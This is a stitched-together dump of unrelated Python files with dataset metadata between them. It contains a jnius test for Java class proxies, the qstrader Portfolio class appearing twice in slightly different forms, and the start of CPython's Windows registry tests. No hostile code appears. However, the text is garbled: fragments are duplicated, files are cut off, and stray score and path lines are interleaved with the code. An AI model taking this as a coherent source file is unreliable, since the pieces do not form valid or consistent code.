    def test_bad_field(self):
        # Instantiating a proxy that declares a nonexistent Java field
        # must raise JavaException.
        @java_class('org/jnius/HelloWorld')
        class HelloWorld(object):
            nonexistent = JavaField('I')
        with self.assertRaises(JavaException) as exc:
            a = HelloWorld()
    # </AK>
|
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import unittest
from jnius import JavaClass, MetaJavaClass, JavaMethod
from jnius import metaclass, java_class # <AK> for jt.jnius additions
from jnius import JavaField, JavaException # -||-
from six import with_metaclass
class HelloWorldTest(unittest.TestCase):
def test_helloworld(self):
class HelloWorld(with_metaclass(MetaJavaClass, JavaClass)):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
# <AK> additions for jt.jnius
def test_helloworld1(self):
@metaclass(MetaJavaClass)
class HelloWorld(JavaClass):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_helloworld2(self):
@metaclass(MetaJavaClass)
class HelloWorld(object):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_helloworld3(self):
@java_class()
class HelloWorld(object):
__javaclass__ = 'org/jnius/HelloWorld'
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_helloworld4(self):
@java_class('org/jnius/HelloWorld')
class HelloWorld(object):
hello = JavaMethod('()Ljava/lang/String;')
a = HelloWorld()
self.assertEqual(a.hello(), 'world')
def test_bad_field(self):
@java_class('org/jnius/HelloWorld')
class HelloWorld(object):
nonexistent = JavaField('I')
with self.assertRaises(JavaException) as exc:
a = HelloWorld()
# </AK>
|
ja
| 0.330186
|
# <AK> for jt.jnius additions # -||- # <AK> additions for jt.jnius # </AK>
| 2.813461
| 3
|
qstrader/broker/portfolio/portfolio.py
|
tradingstrategy-ai/qstrader
| 1
|
6628538
|
<reponame>tradingstrategy-ai/qstrader<filename>qstrader/broker/portfolio/portfolio.py
import copy
import datetime
import logging
import pandas as pd
from qstrader import settings
from qstrader.broker.portfolio.portfolio_event import PortfolioEvent
from qstrader.broker.portfolio.position_handler import PositionHandler
logger = logging.getLogger(__name__)
class Portfolio(object):
"""
Represents a portfolio of assets. It contains a cash
account with the ability to subscribe and withdraw funds.
It also contains a list of positions in assets, encapsulated
by a PositionHandler instance.
Parameters
----------
start_dt : datetime
Portfolio creation datetime.
starting_cash : float, optional
Starting cash of the portfolio. Defaults to 100,000 USD.
currency: str, optional
The portfolio denomination currency.
portfolio_id: str, optional
An identifier for the portfolio.
name: str, optional
The human-readable name of the portfolio.
"""
    def __init__(
        self,
        start_dt,
        starting_cash=0.0,
        currency="USD",
        portfolio_id=None,
        name=None
    ):
        """
        Initialise the Portfolio object with a PositionHandler,
        an event history, along with cash balance. Make sure
        the portfolio denomination currency is also set.
        """
        self.start_dt = start_dt
        self.current_dt = start_dt      # advanced by every dated operation
        self.starting_cash = starting_cash
        self.currency = currency
        self.portfolio_id = portfolio_id
        self.name = name
        self.pos_handler = PositionHandler()
        self.history = []               # PortfolioEvent records, oldest first
        logger.info(
            '(%s) Portfolio "%s" instance initialised' % (
                self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                self.portfolio_id
            )
        )
        self._initialise_portfolio_with_cash()
    def _initialise_portfolio_with_cash(self):
        """
        Initialise the portfolio with a (default) currency Cash Asset
        with quantity equal to 'starting_cash'.
        """
        # copy.copy keeps self.starting_cash as the immutable record of
        # the opening balance while self.cash is mutated over time.
        self.cash = copy.copy(self.starting_cash)
        if self.starting_cash > 0.0:
            # Record (and log) the opening subscription event only when
            # there actually is an opening balance.
            self.history.append(
                PortfolioEvent.create_subscription(
                    self.current_dt, self.starting_cash, self.starting_cash
                )
            )
            logger.info(
                '(%s) Funds subscribed to portfolio "%s" '
                '- Credit: %0.2f, Balance: %0.2f' % (
                    self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                    self.portfolio_id,
                    round(self.starting_cash, 2),
                    round(self.starting_cash, 2)
                )
            )
    @property
    def total_market_value(self):
        """
        Obtain the total market value of the portfolio excluding cash.
        """
        return self.pos_handler.total_market_value()

    @property
    def total_equity(self):
        """
        Obtain the total market value of the portfolio including cash.
        """
        return self.total_market_value + self.cash

    @property
    def total_unrealised_pnl(self):
        """
        Calculate the sum of all the positions' unrealised P&Ls.
        """
        return self.pos_handler.total_unrealised_pnl()

    @property
    def total_realised_pnl(self):
        """
        Calculate the sum of all the positions' realised P&Ls.
        """
        return self.pos_handler.total_realised_pnl()

    @property
    def total_pnl(self):
        """
        Calculate the sum of all the positions' total P&Ls.
        """
        return self.pos_handler.total_pnl()
    def subscribe_funds(self, dt, amount):
        """
        Credit funds to the portfolio.

        Raises
        ------
        ValueError
            If `dt` is earlier than the portfolio's current datetime,
            or if `amount` is negative.
        """
        if dt < self.current_dt:
            raise ValueError(
                'Subscription datetime (%s) is earlier than '
                'current portfolio datetime (%s). Cannot '
                'subscribe funds.' % (dt, self.current_dt)
            )
        self.current_dt = dt
        if amount < 0.0:
            raise ValueError(
                'Cannot credit negative amount: '
                '%s to the portfolio.' % amount
            )
        self.cash += amount
        self.history.append(
            PortfolioEvent.create_subscription(self.current_dt, amount, self.cash)
        )
        logger.info(
            '(%s) Funds subscribed to portfolio "%s" '
            '- Credit: %0.2f, Balance: %0.2f' % (
                self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                self.portfolio_id, round(amount, 2),
                round(self.cash, 2)
            )
        )
    def withdraw_funds(self, dt, amount):
        """
        Withdraw funds from the portfolio if there is enough
        cash to allow it.

        Raises
        ------
        ValueError
            If `dt` is earlier than the portfolio's current datetime,
            if `amount` is negative, or if `amount` exceeds the current
            cash balance.
        """
        # Check that amount is positive and that there is
        # enough in the portfolio to withdraw the funds
        if dt < self.current_dt:
            raise ValueError(
                'Withdrawal datetime (%s) is earlier than '
                'current portfolio datetime (%s). Cannot '
                'withdraw funds.' % (dt, self.current_dt)
            )
        self.current_dt = dt
        if amount < 0:
            raise ValueError(
                'Cannot debit negative amount: '
                '%0.2f from the portfolio.' % amount
            )
        if amount > self.cash:
            raise ValueError(
                'Not enough cash in the portfolio to '
                'withdraw. %s withdrawal request exceeds '
                'current portfolio cash balance of %s.' % (
                    amount, self.cash
                )
            )
        self.cash -= amount
        self.history.append(
            PortfolioEvent.create_withdrawal(self.current_dt, amount, self.cash)
        )
        logger.info(
            '(%s) Funds withdrawn from portfolio "%s" '
            '- Debit: %0.2f, Balance: %0.2f' % (
                self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                self.portfolio_id, round(amount, 2),
                round(self.cash, 2)
            )
        )
    def transact_asset(self, txn, allow_negative_balance=False):
        """
        Adjusts positions to account for a transaction.

        Advances the portfolio clock to the transaction datetime,
        debits cash by the total cost (share cost plus commission),
        delegates the position change to the PositionHandler and
        records a PortfolioEvent in the history.

        Parameters
        ----------
        txn : object
            Transaction-like object; from usage it must expose
            `dt`, `price`, `quantity`, `commission`, `direction`
            and `asset` attributes (assumed — confirm against the
            project's Transaction class).
        allow_negative_balance : bool, optional
            If False (the default), raise RuntimeError when the
            total cost exceeds available cash.

        Raises
        ------
        ValueError
            If the transaction datetime pre-dates the portfolio clock.
        RuntimeError
            If cash is insufficient and negative balances are disallowed.
        """
        if txn.dt < self.current_dt:
            raise ValueError(
                'Transaction datetime (%s) is earlier than '
                'current portfolio datetime (%s). Cannot '
                'transact assets.' % (txn.dt, self.current_dt)
            )
        self.current_dt = txn.dt
        txn_share_cost = txn.price * txn.quantity
        txn_total_cost = txn_share_cost + txn.commission
        if txn_total_cost > self.cash:
            error_msg = (
                'WARNING: Not enough cash in the portfolio to '
                'carry out transaction. Transaction cost of %s '
                'exceeds remaining cash of %s. Transaction '
                'will proceed with a negative cash balance.' % (
                    txn_total_cost, self.cash
                )
            )
            # NOTE(review): when allow_negative_balance is True this
            # message is built but never logged — consider logger.warning.
            if not allow_negative_balance:
                raise RuntimeError(error_msg)
        self.pos_handler.transact_position(txn)
        self.cash -= txn_total_cost
        # Form Portfolio history details
        # txn.direction > 0 is treated as a buy (LONG); anything else SHORT.
        direction = "LONG" if txn.direction > 0 else "SHORT"
        description = "%s %s %s %0.2f %s" % (
            direction, txn.quantity, txn.asset,
            txn.price, datetime.datetime.strftime(txn.dt, "%d/%m/%Y")
        )
        if direction == "LONG":
            # Long transactions are recorded in history as a cash debit.
            pe = PortfolioEvent(
                dt=txn.dt, type='asset_transaction',
                description=description,
                debit=round(txn_total_cost, 2), credit=0.0,
                balance=round(self.cash, 2),
                txn=txn,
            )
            logger.info(
                '(%s) Asset "%s" transacted LONG in portfolio "%s" '
                '- Debit: %0.2f, Balance: %0.2f' % (
                    txn.dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                    txn.asset, self.portfolio_id,
                    round(txn_total_cost, 2), round(self.cash, 2)
                )
            )
        else:
            # Short transactions are recorded as a sign-flipped credit.
            pe = PortfolioEvent(
                dt=txn.dt, type='asset_transaction',
                description=description,
                debit=0.0, credit=-1.0 * round(txn_total_cost, 2),
                balance=round(self.cash, 2),
                txn=txn,
            )
            logger.info(
                '(%s) Asset "%s" transacted SHORT in portfolio "%s" '
                '- Credit: %0.2f, Balance: %0.2f' % (
                    txn.dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                    txn.asset, self.portfolio_id,
                    -1.0 * round(txn_total_cost, 2), round(self.cash, 2)
                )
            )
        self.history.append(pe)
# TODO: Rename as there is now to_dict()
def portfolio_to_dict(self):
"""
Output the portfolio holdings information as a dictionary
with Assets as keys and sub-dictionaries as values.
This excludes cash.
Returns
-------
`dict`
The portfolio holdings.
"""
holdings = {}
for asset, pos in self.pos_handler.positions.items():
holdings[asset] = {
"quantity": pos.net_quantity,
"market_value": pos.market_value,
"unrealised_pnl": pos.unrealised_pnl,
"realised_pnl": pos.realised_pnl,
"total_pnl": pos.total_pnl
}
return holdings
def update_market_value_of_asset(
self, asset, current_price, current_dt
):
"""
Update the market value of the asset to the current
trade price and date.
"""
if asset not in self.pos_handler.positions:
return
else:
if current_price < 0.0:
raise ValueError(
'Current trade price of %s is negative for '
'asset %s. Cannot update position.' % (
current_price, asset
)
)
if current_dt < self.current_dt:
raise ValueError(
'Current trade date of %s is earlier than '
'current date %s of asset %s. Cannot update '
'position.' % (
current_dt, self.current_dt, asset
)
)
self.pos_handler.positions[asset].update_current_price(
current_price, current_dt
)
def history_to_df(self):
"""
Creates a Pandas DataFrame of the Portfolio history.
"""
records = [pe.to_dict() for pe in self.history]
return pd.DataFrame.from_records(
records, columns=[
"date", "type", "description", "debit", "credit", "balance"
]
).set_index(keys=["date"])
def to_dict(self) -> dict:
"""Export the current state of the portfolio as a dict."""
export = {
"name": self.name,
"total_equity": self.total_equity,
"total_market_value": self.total_market_value,
"currency": self.currency,
"cash": self.cash,
"assets": self.portfolio_to_dict(),
}
return export
|
import copy
import datetime
import logging
import pandas as pd
from qstrader import settings
from qstrader.broker.portfolio.portfolio_event import PortfolioEvent
from qstrader.broker.portfolio.position_handler import PositionHandler
# Module-level logger; all Portfolio instances log through it.
logger = logging.getLogger(__name__)
class Portfolio(object):
    """
    Represents a portfolio of assets. It contains a cash
    account with the ability to subscribe and withdraw funds.
    It also contains a list of positions in assets, encapsulated
    by a PositionHandler instance.

    Parameters
    ----------
    start_dt : datetime
        Portfolio creation datetime.
    starting_cash : float, optional
        Starting cash of the portfolio. Defaults to 0.0.
    currency: str, optional
        The portfolio denomination currency. Defaults to "USD".
    portfolio_id: str, optional
        An identifier for the portfolio.
    name: str, optional
        The human-readable name of the portfolio.
    """
    def __init__(
        self,
        start_dt,
        starting_cash=0.0,
        currency="USD",
        portfolio_id=None,
        name=None
    ):
        """
        Initialise the Portfolio object with a PositionHandler,
        an event history, along with cash balance. Make sure
        the portfolio denomination currency is also set.
        """
        self.start_dt = start_dt
        # The portfolio clock; advanced by subscriptions, withdrawals
        # and transactions, which must never move it backwards.
        self.current_dt = start_dt
        self.starting_cash = starting_cash
        self.currency = currency
        self.portfolio_id = portfolio_id
        self.name = name
        # All asset positions are delegated to the PositionHandler.
        self.pos_handler = PositionHandler()
        # Chronological list of PortfolioEvent records.
        self.history = []
        logger.info(
            '(%s) Portfolio "%s" instance initialised' % (
                self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                self.portfolio_id
            )
        )
        self._initialise_portfolio_with_cash()
    def _initialise_portfolio_with_cash(self):
        """
        Initialise the portfolio with a (default) currency Cash Asset
        with quantity equal to 'starting_cash'. A subscription event
        is only recorded when the starting cash is positive.
        """
        self.cash = copy.copy(self.starting_cash)
        if self.starting_cash > 0.0:
            self.history.append(
                PortfolioEvent.create_subscription(
                    self.current_dt, self.starting_cash, self.starting_cash
                )
            )
            logger.info(
                '(%s) Funds subscribed to portfolio "%s" '
                '- Credit: %0.2f, Balance: %0.2f' % (
                    self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                    self.portfolio_id,
                    round(self.starting_cash, 2),
                    round(self.starting_cash, 2)
                )
            )
    @property
    def total_market_value(self):
        """
        Obtain the total market value of the portfolio excluding cash.
        """
        return self.pos_handler.total_market_value()
    @property
    def total_equity(self):
        """
        Obtain the total market value of the portfolio including cash.
        """
        return self.total_market_value + self.cash
    @property
    def total_unrealised_pnl(self):
        """
        Calculate the sum of all the positions' unrealised P&Ls.
        """
        return self.pos_handler.total_unrealised_pnl()
    @property
    def total_realised_pnl(self):
        """
        Calculate the sum of all the positions' realised P&Ls.
        """
        return self.pos_handler.total_realised_pnl()
    @property
    def total_pnl(self):
        """
        Calculate the sum of all the positions' total P&Ls.
        """
        return self.pos_handler.total_pnl()
    def subscribe_funds(self, dt, amount):
        """
        Credit funds to the portfolio.

        Raises ValueError if `dt` pre-dates the portfolio clock or
        the amount is negative.
        """
        if dt < self.current_dt:
            raise ValueError(
                'Subscription datetime (%s) is earlier than '
                'current portfolio datetime (%s). Cannot '
                'subscribe funds.' % (dt, self.current_dt)
            )
        self.current_dt = dt
        if amount < 0.0:
            raise ValueError(
                'Cannot credit negative amount: '
                '%s to the portfolio.' % amount
            )
        self.cash += amount
        self.history.append(
            PortfolioEvent.create_subscription(self.current_dt, amount, self.cash)
        )
        logger.info(
            '(%s) Funds subscribed to portfolio "%s" '
            '- Credit: %0.2f, Balance: %0.2f' % (
                self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                self.portfolio_id, round(amount, 2),
                round(self.cash, 2)
            )
        )
    def withdraw_funds(self, dt, amount):
        """
        Withdraw funds from the portfolio if there is enough
        cash to allow it.

        Raises ValueError on a stale datetime, a negative amount or
        an insufficient balance.
        """
        # Check that amount is positive and that there is
        # enough in the portfolio to withdraw the funds
        if dt < self.current_dt:
            raise ValueError(
                'Withdrawal datetime (%s) is earlier than '
                'current portfolio datetime (%s). Cannot '
                'withdraw funds.' % (dt, self.current_dt)
            )
        self.current_dt = dt
        if amount < 0:
            raise ValueError(
                'Cannot debit negative amount: '
                '%0.2f from the portfolio.' % amount
            )
        if amount > self.cash:
            raise ValueError(
                'Not enough cash in the portfolio to '
                'withdraw. %s withdrawal request exceeds '
                'current portfolio cash balance of %s.' % (
                    amount, self.cash
                )
            )
        self.cash -= amount
        self.history.append(
            PortfolioEvent.create_withdrawal(self.current_dt, amount, self.cash)
        )
        logger.info(
            '(%s) Funds withdrawn from portfolio "%s" '
            '- Debit: %0.2f, Balance: %0.2f' % (
                self.current_dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                self.portfolio_id, round(amount, 2),
                round(self.cash, 2)
            )
        )
    def transact_asset(self, txn, allow_negative_balance=False):
        """
        Adjusts positions to account for a transaction.

        Debits cash by the total cost (share cost plus commission),
        delegates the position change to the PositionHandler and
        records a PortfolioEvent. Raises RuntimeError when cash is
        insufficient and `allow_negative_balance` is False.
        """
        if txn.dt < self.current_dt:
            raise ValueError(
                'Transaction datetime (%s) is earlier than '
                'current portfolio datetime (%s). Cannot '
                'transact assets.' % (txn.dt, self.current_dt)
            )
        self.current_dt = txn.dt
        txn_share_cost = txn.price * txn.quantity
        txn_total_cost = txn_share_cost + txn.commission
        if txn_total_cost > self.cash:
            error_msg = (
                'WARNING: Not enough cash in the portfolio to '
                'carry out transaction. Transaction cost of %s '
                'exceeds remaining cash of %s. Transaction '
                'will proceed with a negative cash balance.' % (
                    txn_total_cost, self.cash
                )
            )
            if not allow_negative_balance:
                raise RuntimeError(error_msg)
        self.pos_handler.transact_position(txn)
        self.cash -= txn_total_cost
        # Form Portfolio history details
        # txn.direction > 0 is treated as a buy (LONG); otherwise SHORT.
        direction = "LONG" if txn.direction > 0 else "SHORT"
        description = "%s %s %s %0.2f %s" % (
            direction, txn.quantity, txn.asset,
            txn.price, datetime.datetime.strftime(txn.dt, "%d/%m/%Y")
        )
        if direction == "LONG":
            # Long transactions are recorded as a cash debit.
            pe = PortfolioEvent(
                dt=txn.dt, type='asset_transaction',
                description=description,
                debit=round(txn_total_cost, 2), credit=0.0,
                balance=round(self.cash, 2),
                txn=txn,
            )
            logger.info(
                '(%s) Asset "%s" transacted LONG in portfolio "%s" '
                '- Debit: %0.2f, Balance: %0.2f' % (
                    txn.dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                    txn.asset, self.portfolio_id,
                    round(txn_total_cost, 2), round(self.cash, 2)
                )
            )
        else:
            # Short transactions are recorded as a sign-flipped credit.
            pe = PortfolioEvent(
                dt=txn.dt, type='asset_transaction',
                description=description,
                debit=0.0, credit=-1.0 * round(txn_total_cost, 2),
                balance=round(self.cash, 2),
                txn=txn,
            )
            logger.info(
                '(%s) Asset "%s" transacted SHORT in portfolio "%s" '
                '- Credit: %0.2f, Balance: %0.2f' % (
                    txn.dt.strftime(settings.LOGGING["DATE_FORMAT"]),
                    txn.asset, self.portfolio_id,
                    -1.0 * round(txn_total_cost, 2), round(self.cash, 2)
                )
            )
        self.history.append(pe)
    # TODO: Rename as there is now to_dict()
    def portfolio_to_dict(self):
        """
        Output the portfolio holdings information as a dictionary
        with Assets as keys and sub-dictionaries as values.
        This excludes cash.

        Returns
        -------
        `dict`
            The portfolio holdings.
        """
        holdings = {}
        for asset, pos in self.pos_handler.positions.items():
            holdings[asset] = {
                "quantity": pos.net_quantity,
                "market_value": pos.market_value,
                "unrealised_pnl": pos.unrealised_pnl,
                "realised_pnl": pos.realised_pnl,
                "total_pnl": pos.total_pnl
            }
        return holdings
    def update_market_value_of_asset(
        self, asset, current_price, current_dt
    ):
        """
        Update the market value of the asset to the current
        trade price and date. Unknown assets are silently ignored;
        negative prices or stale dates raise ValueError.
        """
        if asset not in self.pos_handler.positions:
            return
        else:
            if current_price < 0.0:
                raise ValueError(
                    'Current trade price of %s is negative for '
                    'asset %s. Cannot update position.' % (
                        current_price, asset
                    )
                )
            if current_dt < self.current_dt:
                raise ValueError(
                    'Current trade date of %s is earlier than '
                    'current date %s of asset %s. Cannot update '
                    'position.' % (
                        current_dt, self.current_dt, asset
                    )
                )
            self.pos_handler.positions[asset].update_current_price(
                current_price, current_dt
            )
    def history_to_df(self):
        """
        Creates a Pandas DataFrame of the Portfolio history,
        indexed by event date.
        """
        records = [pe.to_dict() for pe in self.history]
        return pd.DataFrame.from_records(
            records, columns=[
                "date", "type", "description", "debit", "credit", "balance"
            ]
        ).set_index(keys=["date"])
    def to_dict(self) -> dict:
        """Export the current state of the portfolio as a dict."""
        export = {
            "name": self.name,
            "total_equity": self.total_equity,
            "total_market_value": self.total_market_value,
            "currency": self.currency,
            "cash": self.cash,
            "assets": self.portfolio_to_dict(),
        }
        return export
|
en
| 0.846148
|
Represents a portfolio of assets. It contains a cash account with the ability to subscribe and withdraw funds. It also contains a list of positions in assets, encapsulated by a PositionHandler instance. Parameters ---------- start_dt : datetime Portfolio creation datetime. starting_cash : float, optional Starting cash of the portfolio. Defaults to 100,000 USD. currency: str, optional The portfolio denomination currency. portfolio_id: str, optional An identifier for the portfolio. name: str, optional The human-readable name of the portfolio. Initialise the Portfolio object with a PositionHandler, an event history, along with cash balance. Make sure the portfolio denomination currency is also set. Initialise the portfolio with a (default) currency Cash Asset with quantity equal to 'starting_cash'. Obtain the total market value of the portfolio excluding cash. Obtain the total market value of the portfolio including cash. Calculate the sum of all the positions' unrealised P&Ls. Calculate the sum of all the positions' realised P&Ls. Calculate the sum of all the positions' total P&Ls. Credit funds to the portfolio. Withdraw funds from the portfolio if there is enough cash to allow it. # Check that amount is positive and that there is # enough in the portfolio to withdraw the funds Adjusts positions to account for a transaction. # Form Portfolio history details # TODO: Rename as there is now to_dict() Output the portfolio holdings information as a dictionary with Assets as keys and sub-dictionaries as values. This excludes cash. Returns ------- `dict` The portfolio holdings. Update the market value of the asset to the current trade price and date. Creates a Pandas DataFrame of the Portfolio history. Export the current state of the portfolio as a dict.
| 2.669012
| 3
|
lib/python2.7/test/test_winreg.py
|
TinkerEdgeR-Android/prebuilts_python_linux-x86_2.7.5
| 2,151
|
6628539
|
# Test the windows specific win32reg module.
# Only win32reg functions not hit here: FlushKey, LoadKey and SaveKey
import os, sys, errno
import unittest
from test import test_support
threading = test_support.import_module("threading")
from platform import machine
# Do this first so test will be skipped if module doesn't exist
test_support.import_module('_winreg')
# Now import everything
from _winreg import *
try:
    # "--remote \\machine" on the command line targets a remote registry;
    # when absent the remote tests are skipped.
    REMOTE_NAME = sys.argv[sys.argv.index("--remote")+1]
except (IndexError, ValueError):
    REMOTE_NAME = None
# tuple of (major, minor)
WIN_VER = sys.getwindowsversion()[:2]
# Some tests should only run on 64-bit architectures where WOW64 will be.
WIN64_MACHINE = True if machine() == "AMD64" else False
# Starting with Windows 7 and Windows Server 2008 R2, WOW64 no longer uses
# registry reflection and formerly reflected keys are shared instead.
# Windows 7 and Windows Server 2008 R2 are version 6.1. Due to this, some
# tests are only valid up until 6.1
HAS_REFLECTION = True if WIN_VER < (6, 1) else False
# Use a per-process key to prevent concurrent test runs (buildbot!) from
# stomping on each other.
test_key_base = "Python Test Key [%d] - Delete Me" % (os.getpid(),)
test_key_name = "SOFTWARE\\" + test_key_base
# On OS'es that support reflection we should test with a reflected key
test_reflect_key_name = "SOFTWARE\\Classes\\" + test_key_base
# (value name, value data, registry type) triples written and read back.
test_data = [
    ("Int Value", 45, REG_DWORD),
    ("String Val", "A string value", REG_SZ),
    ("StringExpand", "The path is %path%", REG_EXPAND_SZ),
    ("Multi-string", ["Lots", "of", "string", "values"], REG_MULTI_SZ),
    ("Raw Data", ("binary"+chr(0)+"data"), REG_BINARY),
    ("Big String", "x"*(2**14-1), REG_SZ),
    ("Big Binary", "x"*(2**14), REG_BINARY),
]
# Python 2 only: also exercise unicode names and values.
if test_support.have_unicode:
    test_data += [
        (unicode("Unicode Val"), unicode("A Unicode value"), REG_SZ,),
        ("UnicodeExpand", unicode("The path is %path%"), REG_EXPAND_SZ),
        ("Multi-unicode", [unicode("Lots"), unicode("of"), unicode("unicode"),
                           unicode("values")], REG_MULTI_SZ),
        ("Multi-mixed", [unicode("Unicode"), unicode("and"), "string",
                         "values"], REG_MULTI_SZ),
    ]
class BaseWinregTests(unittest.TestCase):
    # Shared write/read/delete helpers driven by _test_all(root_key).
    def setUp(self):
        # Make sure that the test key is absent when the test
        # starts.
        self.delete_tree(HKEY_CURRENT_USER, test_key_name)
    def delete_tree(self, root, subkey):
        # Recursively remove `subkey` and everything beneath it.
        try:
            hkey = OpenKey(root, subkey, KEY_ALL_ACCESS)
        except WindowsError:
            # subkey does not exist
            return
        while True:
            try:
                subsubkey = EnumKey(hkey, 0)
            except WindowsError:
                # no more subkeys
                break
            self.delete_tree(hkey, subsubkey)
        CloseKey(hkey)
        DeleteKey(root, subkey)
    def _write_test_data(self, root_key, CreateKey=CreateKey):
        # Set the default value for this key.
        SetValue(root_key, test_key_name, REG_SZ, "Default value")
        key = CreateKey(root_key, test_key_name)
        # Create a sub-key
        sub_key = CreateKey(key, "sub_key")
        # Give the sub-key some named values
        for value_name, value_data, value_type in test_data:
            SetValueEx(sub_key, value_name, 0, value_type, value_data)
        # Check we wrote as many items as we thought.
        nkeys, nvalues, since_mod = QueryInfoKey(key)
        self.assertEqual(nkeys, 1, "Not the correct number of sub keys")
        self.assertEqual(nvalues, 1, "Not the correct number of values")
        nkeys, nvalues, since_mod = QueryInfoKey(sub_key)
        self.assertEqual(nkeys, 0, "Not the correct number of sub keys")
        self.assertEqual(nvalues, len(test_data),
                         "Not the correct number of values")
        # Close this key this way...
        # (but before we do, copy the key as an integer - this allows
        # us to test that the key really gets closed).
        int_sub_key = int(sub_key)
        CloseKey(sub_key)
        try:
            QueryInfoKey(int_sub_key)
            self.fail("It appears the CloseKey() function does "
                      "not close the actual key!")
        except EnvironmentError:
            pass
        # ... and close that key that way :-)
        int_key = int(key)
        key.Close()
        try:
            QueryInfoKey(int_key)
            self.fail("It appears the key.Close() function "
                      "does not close the actual key!")
        except EnvironmentError:
            pass
    def _read_test_data(self, root_key, OpenKey=OpenKey):
        # Check we can get default value for this key.
        val = QueryValue(root_key, test_key_name)
        self.assertEqual(val, "Default value",
                         "Registry didn't give back the correct value")
        key = OpenKey(root_key, test_key_name)
        # Read the sub-keys
        with OpenKey(key, "sub_key") as sub_key:
            # Check I can enumerate over the values.
            index = 0
            while 1:
                try:
                    data = EnumValue(sub_key, index)
                except EnvironmentError:
                    break
                self.assertIn(data, test_data,
                              "Didn't read back the correct test data")
                index = index + 1
            self.assertEqual(index, len(test_data),
                             "Didn't read the correct number of items")
            # Check I can directly access each item
            for value_name, value_data, value_type in test_data:
                read_val, read_typ = QueryValueEx(sub_key, value_name)
                self.assertEqual(read_val, value_data,
                                 "Could not directly read the value")
                self.assertEqual(read_typ, value_type,
                                 "Could not directly read the value")
        sub_key.Close()
        # Enumerate our main key.
        read_val = EnumKey(key, 0)
        self.assertEqual(read_val, "sub_key", "Read subkey value wrong")
        try:
            EnumKey(key, 1)
            self.fail("Was able to get a second key when I only have one!")
        except EnvironmentError:
            pass
        key.Close()
    def _delete_test_data(self, root_key):
        key = OpenKey(root_key, test_key_name, 0, KEY_ALL_ACCESS)
        sub_key = OpenKey(key, "sub_key", 0, KEY_ALL_ACCESS)
        # It is not necessary to delete the values before deleting
        # the key (although subkeys must not exist). We delete them
        # manually just to prove we can :-)
        for value_name, value_data, value_type in test_data:
            DeleteValue(sub_key, value_name)
        nkeys, nvalues, since_mod = QueryInfoKey(sub_key)
        self.assertEqual(nkeys, 0, "subkey not empty before delete")
        self.assertEqual(nvalues, 0, "subkey not empty before delete")
        sub_key.Close()
        DeleteKey(key, "sub_key")
        try:
            # Shouldn't be able to delete it twice!
            DeleteKey(key, "sub_key")
            self.fail("Deleting the key twice succeeded")
        except EnvironmentError:
            pass
        key.Close()
        DeleteKey(root_key, test_key_name)
        # Opening should now fail!
        try:
            key = OpenKey(root_key, test_key_name)
            self.fail("Could open the non-existent key")
        except WindowsError: # Use this error name this time
            pass
    def _test_all(self, root_key):
        # Full round-trip: write, read back, then delete.
        self._write_test_data(root_key)
        self._read_test_data(root_key)
        self._delete_test_data(root_key)
class LocalWinregTests(BaseWinregTests):
    # Tests that run against the local HKEY_CURRENT_USER hive only.
    def test_registry_works(self):
        self._test_all(HKEY_CURRENT_USER)
    def test_registry_works_extended_functions(self):
        # Substitute the regular CreateKey and OpenKey calls with their
        # extended counterparts.
        # Note: DeleteKeyEx is not used here because it is platform dependent
        cke = lambda key, sub_key: CreateKeyEx(key, sub_key, 0, KEY_ALL_ACCESS)
        self._write_test_data(HKEY_CURRENT_USER, cke)
        oke = lambda key, sub_key: OpenKeyEx(key, sub_key, 0, KEY_READ)
        self._read_test_data(HKEY_CURRENT_USER, oke)
        self._delete_test_data(HKEY_CURRENT_USER)
    def test_connect_registry_to_local_machine_works(self):
        # perform minimal ConnectRegistry test which just invokes it
        h = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
        self.assertNotEqual(h.handle, 0)
        h.Close()
        self.assertEqual(h.handle, 0)
    def test_inexistant_remote_registry(self):
        connect = lambda: ConnectRegistry("abcdefghijkl", HKEY_CURRENT_USER)
        self.assertRaises(WindowsError, connect)
    def test_expand_environment_strings(self):
        r = ExpandEnvironmentStrings(u"%windir%\\test")
        self.assertEqual(type(r), unicode)
        self.assertEqual(r, os.environ["windir"] + "\\test")
    def test_context_manager(self):
        # ensure that the handle is closed if an exception occurs
        try:
            with ConnectRegistry(None, HKEY_LOCAL_MACHINE) as h:
                self.assertNotEqual(h.handle, 0)
                raise WindowsError
        except WindowsError:
            self.assertEqual(h.handle, 0)
    def test_changing_value(self):
        # Issue2810: A race condition in 2.6 and 3.1 may cause
        # EnumValue or QueryValue to raise "WindowsError: More data is
        # available"
        done = False
        class VeryActiveThread(threading.Thread):
            # Continuously rewrites the value while the main thread reads.
            def run(self):
                with CreateKey(HKEY_CURRENT_USER, test_key_name) as key:
                    use_short = True
                    long_string = 'x'*2000
                    while not done:
                        s = 'x' if use_short else long_string
                        use_short = not use_short
                        SetValue(key, 'changing_value', REG_SZ, s)
        thread = VeryActiveThread()
        thread.start()
        try:
            with CreateKey(HKEY_CURRENT_USER,
                           test_key_name+'\\changing_value') as key:
                for _ in range(1000):
                    num_subkeys, num_values, t = QueryInfoKey(key)
                    for i in range(num_values):
                        name = EnumValue(key, i)
                        QueryValue(key, name[0])
        finally:
            done = True
            thread.join()
        with OpenKey(HKEY_CURRENT_USER, test_key_name, 0, KEY_ALL_ACCESS) as key:
            DeleteKey(key, 'changing_value')
